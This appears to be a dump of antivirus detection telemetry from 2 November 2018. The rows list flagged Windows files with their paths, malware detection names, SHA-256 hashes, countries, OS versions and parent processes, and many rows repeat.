  Row(detection=Row(filename='avscan-20181102-095520-c8d13193', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-095520-C8D13193', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='3e8859292c3ca10adaec120d3db73e981ca6bb12446a4327d03bbc4e1cc7883b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:57:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0123720.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0123720.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~sef6ed.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seF6ED.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='10c9afc9bb863ce61bd43523cd17d856beee9958e4d7df3513cad2b48edc477b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s_vag.exe', filepath='c:\\napro\\pc-scan3000 fl\\sistema_injecao\\s_vag.exe', filesize=3008000, name='HEUR/APC.#M1.#R1'), hash='176078c89d8322f3708cae7368757e98195ed0510fdba989ed36df5edeb91669', metadata=Row(cmdline='000', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\NAPRO\\PC-SCAN3000 FL\\Menu_3000FL.exe', parentsize=5877760, timestamp='2018-11-02T14:48:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yacht.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\YACHT\\YACHT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0008165.exe', filepath='I:\\System Volume Information\\_restore{41A21028-79D8-41F6-B5EB-76D4AC815628}\\RP4\\A0008165.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='16e1e44fdba79cc4a496d29d15fc7014f451ee62f91264a216015ea4e03d0680', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-02T16:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061324-60478b2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061324-60478B2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051933-da9a4e6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051933-DA9A4E6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153607-e1f2a555', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153607-E1F2A555', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054800-d3fc76c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054800-D3FC76C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32_7639e1d1.dll', filepath='D:\\# Andromeda Backup\\2018-10\\Downloads\\Setup\\msimg32_7639e1d1.dll', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe6_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe6 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=346112, timestamp='2018-11-02T23:46:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tvulslvu.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\TvulSLVU.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055231-75883021', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055231-75883021', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051518-4283b70c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051518-4283B70C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061240-45ff7ff3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061240-45FF7FF3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143833-603af363', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143833-603AF363', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163105-82650c5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e64cb28\\AVSCAN-20181102-162959-7940ACA9\\AVSCAN-20181102-163105-82650C5D', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:31:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055219-6e14294b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055219-6E14294B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120557-172048a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120557-172048A9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053909-97a436b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053909-97A436B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154938-7899ea48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154938-7899EA48', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:52:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054255-1e255ae4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054255-1E255AE4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051551-55e4ce16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051551-55E4CE16', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:00:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051523-4576ac30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051523-4576AC30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055218-6d5f0993', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055218-6D5F0993', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053127-83db20ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053127-83DB20AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050405-b119a2bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050405-B119A2BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050419-b9a27214', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050419-B9A27214', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062028-5cdbbcdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062028-5CDBBCDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051640-7354951d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051640-7354951D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062051-6aa71b1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062051-6AA71B1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060456-31b94d9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060456-31B94D9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055559-f1389296', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055559-F1389296', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062515-084f88be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062515-084F88BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052949-498c9469', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052949-498C9469', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061024-f4d4e044', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061024-F4D4E044', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052124-1cae4121', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052124-1CAE4121', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052003-ec28171e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052003-EC28171E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060552-531cd58c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060552-531CD58C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055005-1e60babd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055005-1E60BABD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:04Z'), dt=datetime.date(2018, 11, 2)),
